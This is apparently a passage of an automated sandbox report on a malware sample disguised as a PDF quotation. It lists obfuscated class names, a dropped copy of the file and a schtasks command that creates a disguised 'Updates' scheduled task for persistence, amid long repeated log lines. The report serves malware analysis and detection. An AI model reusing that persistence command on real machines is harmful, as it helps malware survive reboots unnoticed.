                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, G6M6jnkKXAxGXHKNmU.csHigh entropy of concatenated method names: 'RhHAuyfVay', 'EjmAWgsBv0', 'cyZADh1wPG', 'dlQARVAKyh', 'V1JAtrYOZZ', 'K9VAqJigVX', 'lOvAhAoSeC', 'uIMArJuIbq', 'Iv7AQKXBuS', 'wZCAZpWt84'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, ld8Zy6HNxVOyY3u02Wr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dv83eB6BAM', 'eKH3LU0ctO', 'fSd32xwoeU', 'Sh033cAh9M', 'tcb3IWxvMR', 'm7O3MbcFyt', 'pE23vZnQtg'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, NhTCM9Z8e83c1vPLAZ.csHigh entropy of concatenated method names: 'JjNLPkN8R5', 'J9LL6G34Qr', 'ELsLgo0T0p', 'jotLyVkCHd', 'QCkLe8pli1', 'Xr9LCNYnRF', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, P8C9rkDoMuYdUq0kte.csHigh entropy of concatenated method names: 'ToString', 'RCE58DZcIi', 'bxH5wIxlRM', 'lRl5XfT1HJ', 'MGS5m2cgVJ', 'Oe35inHI28', 'xSH5sGBLmv', 'OWh5nEIULc', 'PSV57Zjk5o', 'bXd5K6Kdc9'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.csHigh entropy of concatenated method names: 'GivldaEnxd', 'fy0ljf0lU2', 'ofJlAUM4s4', 'OgplPyqTsn', 'TK9l6xSGrF', 'Ey9lgPt55u', 'yiDlyDHobo', 'X3mlCj2fc1', 'CdGlpGV9yZ', 'BetlTVwmyt'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, goVFEnuuIYdGElAf1P.csHigh entropy of concatenated method names: 'vykVbHNOKT', 'OUeVUWsclK', 'G9iVutd1h9', 'iLGVWIwvMU', 'DTxVwsv1Ab', 'wosVXS0v9g', 'trDVmKmDbI', 'XbsViGEwp4', 'A1aVsxiIK1', 'ucVVn0TCIk'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, YGKv1VHHY7YGJjaWvBI.csHigh entropy of concatenated method names: 'nI3LZxxUXD', 'iLnLzCkK9c', 'mOQ2BHuaDV', 'RNh2Hi9b4U', 'jkf2SundNl', 'uBM2lMpKbJ', 'xXc2Nwt4wf', 'lOd2d1QWdw', 'NVM2jvmX5S', 'Qb82AkLyyu'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, uqSudIA7xkgfkKu8uq.csHigh entropy of concatenated method names: 'Dispose', 'dcUHQHM6d3', 'JkjSw0PTv4', 'QJ2gijO3uO', 'asTHZkb1WS', 'qsXHzrjauA', 'ProcessDialogKey', 'UfLSBkE5Sk', 'B0YSHm0sHK', 'z4cSSKhTCM'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, BF0ad2PdcQycQg2Ypw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n77SQ5vIRj', 'CUcSZnFngs', 'gA6SzZm41d', 'vlKlBJ3MYl', 'LX1lHtEfOR', 'a4klStPnVD', 'caIllx590p', 'zKbJBukJpbZV2fvDCij'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, g2kfQWqWgG7d7Kou8E.csHigh entropy of concatenated method names: 'HjWGrrtISR', 'G5MGZ9AMyZ', 'f5YFBPT1vF', 'PlMFHwXnLI', 'qd1G8KQO4P', 'b3BGUV2xsv', 'dcnGob7QLw', 'VNHGuHtYkw', 'qfxGWKyyrt', 'Jj4GD1Slgd'
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, DlRvq5yJkomY4LIf3S.csHigh entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, vH9V9oD7tIKkmfHnnj.csHigh entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, IbChofHBavJhR0AihhL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lfoL8HFeZe', 'ha8LUliL5e', 'wIXLo30fM4', 'vQGLu6Cd8h', 'gRsLWIqSLw', 'QfULDqeR1h', 'VPDLRDnOu3'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, tsV8XMYQesaCGZGGyJ.csHigh entropy of concatenated method names: 'zH3gdLsfL7', 'GTIgATpmr5', 'lOEg6ba8wq', 'X6Ygyq72vq', 'Dr1gCiphi5', 'unO6t2YICV', 'd556qY0lCD', 'nQ56hNM0OQ', 'KNG6rPpeIw', 'F8j6QcTK79'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, skE5SkQ10Ym0sHKx4c.csHigh entropy of concatenated method names: 'GUkeYbW8UU', 'l5pewCrs3m', 'YixeXVcgBp', 'cCyemHchUy', 'uPLeiQp0AS', 'ipHesOgvgf', 'SgyentrBXX', 'kQXe7ljDel', 'HqleK0dGXM', 'yaOebDEh24'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, qEgAcuoEHnySCyVCiE.csHigh entropy of concatenated method names: 'sATfkjrxTh', 'TVBf91dNIZ', 'VVgfYjS3Qg', 'GCEfw9sDdG', 'q7sfmIG5Y0', 'xEdfi7XHrf', 'IQNfn6OWu2', 'lWsf7A75s8', 'N6VfbIps1h', 'inif85KAnX'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, rx2adFKqKDDvpdwsNE.csHigh entropy of concatenated method names: 'AJWy4Nl5or', 'S1iyJCHBmM', 'KIjyxIUuCA', 'J0Dy0R6kyQ', 'x1Cy1rYI2U', 'JsRycT9IL2', 'oOFyOqXClQ', 'r2oykGWdCx', 'lEQy9bP8B4', 'cfmyaaOGGL'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, YJwornhL8NcUHM6d3H.csHigh entropy of concatenated method names: 'AdleVp5KX0', 'fXVeGJxhxm', 'F6oeerNqxF', 'NKve2IUPbK', 'LVPeIvcxBe', 'AiCevs6dIO', 'Dispose', 'YvaFj5ApOO', 'Sk2FA7Zq4x', 'tMMFPiRPK7'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, bY2l2W9aTvqvV3SIa6.csHigh entropy of concatenated method names: 'i7tP0rcAma', 'DVRPcYKoOb', 'KAMPkCSVFc', 'ni3P9N3MG8', 'yObPVcYRZi', 'mQ1P5hA0Lc', 'FSiPGuZ7KG', 'Hv0PFI0MYk', 'CGQPeMr0fP', 'BRNPL8vxPr'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, F7edAXSK92OBYECXq6.csHigh entropy of concatenated method names: 'lQTxs9hkv', 'GqJ0DsyJl', 'CbNcytVV4', 'QneOSAi9o', 'PBY9YuJXy', 'HQAa3y27i', 'hgxjV3DFItn00kKthB', 'KcSHfpestFmg0cqrIB', 'r8GF5Vcj0', 'kH5L9Pga3'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, Rp2frEnK0ssvc1GG09.csHigh entropy of concatenated method names: 'SdRyjBHoba', 'HNDyPDTV84', 'fLOygavwjW', 'HJEgZopU44', 'z6Tgz6ivjc', 'keEyBJcmK3', 'r9UyHLabEu', 'MJVySvZldv', 'gK3ylmC6jZ', 'XS6yNfTq2h'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, fZqjEMzUF5Mu3o6cex.csHigh entropy of concatenated method names: 'vUULcY6vXo', 'vejLkUuwn0', 'JrUL9MYGdE', 'X5ZLYccuDK', 'bfULwIXXVl', 'cfKLmTQFNO', 'B04LiBdpPQ', 'WfTLvCvagx', 'pUML46N62O', 'ogZLJSAoSF'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, q1NDsIahNrqhQyscMU.csHigh entropy of concatenated method names: 'nBs61LLEl9', 'ae36OA4pew', 'YE2PXV3lsR', 'B6VPmp75Gc', 'WsrPiGeQQx', 'aPWPsH1QeA', 'fEDPnvK6Gn', 'jI0P77ghml', 'BTxPKm9inR', 'CWePbh7YCP'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, AUokIxRdW3ZZkuiCsM.csHigh entropy of concatenated method names: 'BnrGTCkjXJ', 'BRHGEvcb5u', 'ToString', 'wxCGj0OxsT', 'qqZGAHrnk0', 'QDcGPTApPh', 'VYfG69vwIK', 'zp9GgbVE86', 'HW4GykGwGb', 'eELGCxwBRk'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, IodeJPNUOx7OkleCZR.csHigh entropy of concatenated method names: 'MIYHy6M6jn', 'NXAHCxGXHK', 'SaTHTvqvV3', 'cIaHE6G1ND', 'jscHVMU2sV', 'OXMH5QesaC', 'XSqxqG3IlbgqNnoqyE', 'OG14L2tdWAN5rA0p0o', 'PD6HHrgjTd', 'fNXHlavHR3'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, G6M6jnkKXAxGXHKNmU.csHigh entropy of concatenated method names: 'RhHAuyfVay', 'EjmAWgsBv0', 'cyZADh1wPG', 'dlQARVAKyh', 'V1JAtrYOZZ', 'K9VAqJigVX', 'lOvAhAoSeC', 'uIMArJuIbq', 'Iv7AQKXBuS', 'wZCAZpWt84'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, ld8Zy6HNxVOyY3u02Wr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dv83eB6BAM', 'eKH3LU0ctO', 'fSd32xwoeU', 'Sh033cAh9M', 'tcb3IWxvMR', 'm7O3MbcFyt', 'pE23vZnQtg'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, NhTCM9Z8e83c1vPLAZ.csHigh entropy of concatenated method names: 'JjNLPkN8R5', 'J9LL6G34Qr', 'ELsLgo0T0p', 'jotLyVkCHd', 'QCkLe8pli1', 'Xr9LCNYnRF', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, P8C9rkDoMuYdUq0kte.csHigh entropy of concatenated method names: 'ToString', 'RCE58DZcIi', 'bxH5wIxlRM', 'lRl5XfT1HJ', 'MGS5m2cgVJ', 'Oe35inHI28', 'xSH5sGBLmv', 'OWh5nEIULc', 'PSV57Zjk5o', 'bXd5K6Kdc9'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.csHigh entropy of concatenated method names: 'GivldaEnxd', 'fy0ljf0lU2', 'ofJlAUM4s4', 'OgplPyqTsn', 'TK9l6xSGrF', 'Ey9lgPt55u', 'yiDlyDHobo', 'X3mlCj2fc1', 'CdGlpGV9yZ', 'BetlTVwmyt'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, goVFEnuuIYdGElAf1P.csHigh entropy of concatenated method names: 'vykVbHNOKT', 'OUeVUWsclK', 'G9iVutd1h9', 'iLGVWIwvMU', 'DTxVwsv1Ab', 'wosVXS0v9g', 'trDVmKmDbI', 'XbsViGEwp4', 'A1aVsxiIK1', 'ucVVn0TCIk'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, YGKv1VHHY7YGJjaWvBI.csHigh entropy of concatenated method names: 'nI3LZxxUXD', 'iLnLzCkK9c', 'mOQ2BHuaDV', 'RNh2Hi9b4U', 'jkf2SundNl', 'uBM2lMpKbJ', 'xXc2Nwt4wf', 'lOd2d1QWdw', 'NVM2jvmX5S', 'Qb82AkLyyu'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, uqSudIA7xkgfkKu8uq.csHigh entropy of concatenated method names: 'Dispose', 'dcUHQHM6d3', 'JkjSw0PTv4', 'QJ2gijO3uO', 'asTHZkb1WS', 'qsXHzrjauA', 'ProcessDialogKey', 'UfLSBkE5Sk', 'B0YSHm0sHK', 'z4cSSKhTCM'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, BF0ad2PdcQycQg2Ypw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n77SQ5vIRj', 'CUcSZnFngs', 'gA6SzZm41d', 'vlKlBJ3MYl', 'LX1lHtEfOR', 'a4klStPnVD', 'caIllx590p', 'zKbJBukJpbZV2fvDCij'
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, g2kfQWqWgG7d7Kou8E.csHigh entropy of concatenated method names: 'HjWGrrtISR', 'G5MGZ9AMyZ', 'f5YFBPT1vF', 'PlMFHwXnLI', 'qd1G8KQO4P', 'b3BGUV2xsv', 'dcnGob7QLw', 'VNHGuHtYkw', 'qfxGWKyyrt', 'Jj4GD1Slgd'
                    Source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, DlRvq5yJkomY4LIf3S.csHigh entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                    Source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, vH9V9oD7tIKkmfHnnj.csHigh entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                    Source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, DlRvq5yJkomY4LIf3S.csHigh entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                    Source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, vH9V9oD7tIKkmfHnnj.csHigh entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                    Source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, DlRvq5yJkomY4LIf3S.csHigh entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                    Source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, vH9V9oD7tIKkmfHnnj.csHigh entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                    Source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, DlRvq5yJkomY4LIf3S.csHigh entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                    Source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, vH9V9oD7tIKkmfHnnj.csHigh entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
